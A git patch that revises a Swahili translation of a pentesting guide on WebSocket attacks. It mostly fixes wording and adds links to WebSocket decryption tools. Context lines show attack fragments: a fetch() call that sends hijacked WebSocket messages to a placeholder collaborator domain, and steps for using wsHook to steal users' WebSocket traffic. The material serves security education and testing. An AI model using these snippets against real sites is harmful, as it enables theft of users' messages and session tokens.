From f72a804760d9043288d3a35dcb77612c46d7b26d Mon Sep 17 00:00:00 2001
From: Translator <github-actions@github.com>
Date: Sun, 9 Mar 2025 14:31:29 +0000
Subject: [PATCH] Translated ['src/pentesting-web/websocket-attacks.md'] to sw

---
 src/pentesting-web/websocket-attacks.md | 21 +++++++++++++--------
 1 file changed, 13 insertions(+), 8 deletions(-)

diff --git a/src/pentesting-web/websocket-attacks.md b/src/pentesting-web/websocket-attacks.md
index 687472662..aaa53d2bd 100644
--- a/src/pentesting-web/websocket-attacks.md
+++ b/src/pentesting-web/websocket-attacks.md
@@ -4,7 +4,7 @@
 
 ## What are WebSockets
 
-WebSocket connections zinaundwa kupitia mkutano wa awali wa **HTTP** na zimeundwa kuwa **za muda mrefu**, zikiruhusu ujumbe wa pande mbili wakati wowote bila haja ya mfumo wa kibiashara. Hii inafanya WebSockets kuwa na faida hasa kwa programu zinazohitaji **latency ya chini au mawasiliano yanayoanzishwa na seva**, kama vile mitiririko ya data za kifedha za moja kwa moja.
+WebSocket connections zinaundwa kupitia mkutano wa awali wa **HTTP** na zimeundwa kuwa **za muda mrefu**, zikiruhusu ujumbe wa pande mbili wakati wowote bila haja ya mfumo wa kibiashara. Hii inafanya WebSockets kuwa na faida hasa kwa programu zinazohitaji **muda mfupi wa kuchelewesha au mawasiliano yanayoanzishwa na seva**, kama vile mitiririko ya data za kifedha za moja kwa moja.
 
 ### Establishment of WebSocket Connections
 
@@ -26,7 +26,7 @@ Connection: keep-alive, Upgrade
 Cookie: session=KOsEJNuflw4Rd9BDNrVmvwBF9rEijeE2
 Upgrade: websocket
 ```
-Majibu ya mkono wa server:
+Majibu ya mkono wa mkono wa seva:
 ```javascript
 HTTP/1.1 101 Switching Protocols
 Connection: Upgrade
@@ -63,17 +63,22 @@ websocat -E --insecure --text ws-listen:0.0.0.0:8000 wss://10.10.10.10:8000 -v
 ```
 ### Websockets enumeration
 
-Unaweza kutumia **tool** [**https://github.com/PalindromeLabs/STEWS**](https://github.com/PalindromeLabs/STEWS) **kugundua, fingerprint na kutafuta** **vulnerabilities** zinazojulikana katika websockets kiotomatiki.
+Unaweza kutumia **tool** [**https://github.com/PalindromeLabs/STEWS**](https://github.com/PalindromeLabs/STEWS) **kuvumbua, fingerprint na kutafuta** **vulnerabilities** zinazojulikana katika websockets kiotomatiki.
 
 ### Websocket Debug tools
 
 - **Burp Suite** inasaidia mawasiliano ya MitM websockets kwa njia inayofanana sana na inavyofanya kwa mawasiliano ya kawaida ya HTTP.
-- [**socketsleuth**](https://github.com/snyk/socketsleuth) **Burp Suite extension** itakuruhusu kudhibiti mawasiliano ya Websocket kwa njia bora zaidi katika Burp kwa kupata **history**, kuweka **interception rules**, kutumia **match and replace** rules, kutumia **Intruder** na **AutoRepeater.**
-- [**WSSiP**](https://github.com/nccgroup/wssip)**:** Fupi kwa "**WebSocket/Socket.io Proxy**", chombo hiki, kilichoandikwa kwa Node.js, kinatoa interface ya mtumiaji ili **kuchukua, kukamata, kutuma ujumbe wa kawaida** na kuona mawasiliano yote ya WebSocket na Socket.IO kati ya mteja na seva.
-- [**wsrepl**](https://github.com/doyensec/wsrepl) ni **interactive websocket REPL** iliyoundwa mahsusi kwa ajili ya pentesting. Inatoa interface ya kuangalia **ujumbe wa websocket unaoingia na kutuma mpya**, kwa mfumo rahisi wa **kujiendesha** mawasiliano haya.
+- [**socketsleuth**](https://github.com/snyk/socketsleuth) **Burp Suite extension** itakuruhusu kudhibiti mawasiliano ya Websocket kwa njia bora katika Burp kwa kupata **history**, kuweka **interception rules**, kutumia **match and replace** rules, kutumia **Intruder** na **AutoRepeater.**
+- [**WSSiP**](https://github.com/nccgroup/wssip)**:** Fupi kwa "**WebSocket/Socket.io Proxy**", chombo hiki, kilichoandikwa kwa Node.js, kinatoa interface ya mtumiaji ili **kukamata, kuingilia, kutuma ujumbe wa kawaida** na kuona mawasiliano yote ya WebSocket na Socket.IO kati ya mteja na seva.
+- [**wsrepl**](https://github.com/doyensec/wsrepl) ni **interactive websocket REPL** iliyoundwa mahsusi kwa ajili ya penetration testing. Inatoa interface ya kuangalia **ujumbe wa websocket unaoingia na kutuma mpya**, kwa mfumo rahisi wa **kujiendesha** mawasiliano haya.
 - [**https://websocketking.com/**](https://websocketking.com/) ni **web ya kuwasiliana** na tovuti nyingine kwa kutumia **websockets**.
 - [**https://hoppscotch.io/realtime/websocket**](https://hoppscotch.io/realtime/websocket) kati ya aina nyingine za mawasiliano/protocols, inatoa **web ya kuwasiliana** na tovuti nyingine kwa kutumia **websockets.**
 
+## Decrypting Websocket
+
+- [https://github.com/Anof-cyber/PyCript](https://github.com/Anof-cyber/PyCript)
+- [https://github.com/Anof-cyber/PyCript-WebSocket/](https://github.com/Anof-cyber/PyCript-WebSocket/)
+
 ## Websocket Lab
 
 Katika [**Burp-Suite-Extender-Montoya-Course**](https://github.com/federicodotta/Burp-Suite-Extender-Montoya-Course) una msimbo wa kuzindua tovuti kwa kutumia websockets na katika [**this post**](https://security.humanativaspa.it/extending-burp-suite-for-fun-and-profit-the-montoya-way-part-3/) unaweza kupata maelezo.
@@ -105,7 +110,7 @@ fetch('https://your-collaborator-domain/?'+event.data, {mode: 'no-cors'})
 ```
 ### Cross Origin + Cookie with a different subdomain
 
-Katika chapisho hili la blogu [https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets/](https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets/) mshambuliaji alifanikiwa **kutekeleza Javascript isiyo na mipaka katika subdomain** ya kikoa ambapo mawasiliano ya web socket yalikuwa yanafanyika. Kwa sababu ilikuwa **subdomain**, **cookie** ilikuwa inatumwa, na kwa sababu **Websocket haikukagua Origin ipasavyo**, ilikuwa inawezekana kuwasiliana nayo na **kuiba tokens kutoka kwake**.
+Katika chapisho hili la blogu [https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets/](https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets/) mshambuliaji alifanikiwa **kutekeleza Javascript isiyo na mipaka katika subdomain** ya kikoa ambapo mawasiliano ya web socket yalikuwa yanafanyika. Kwa sababu ilikuwa **subdomain**, **cookie** ilikuwa **inatumwa**, na kwa sababu **Websocket haikukagua Origin ipasavyo**, ilikuwa inawezekana kuwasiliana nayo na **kuiba tokens kutoka kwake**.
 
 ### Stealing data from user
 
@@ -129,7 +134,7 @@ xhttp.send()
 return messageEvent
 }
 ```
-Sasa pakua faili `wsHook.js` kutoka [https://github.com/skepticfx/wshook](https://github.com/skepticfx/wshook) na **uhifadhi ndani ya folda yenye faili za wavuti**.\
+Sasa pakua faili la `wsHook.js` kutoka [https://github.com/skepticfx/wshook](https://github.com/skepticfx/wshook) na **uhifadhi ndani ya folda yenye faili za wavuti**.\
 Kufichua programu ya wavuti na kumfanya mtumiaji aungane nayo utaweza kuiba ujumbe uliotumwa na kupokelewa kupitia websocket:
 ```javascript
 sudo python3 -m http.server 80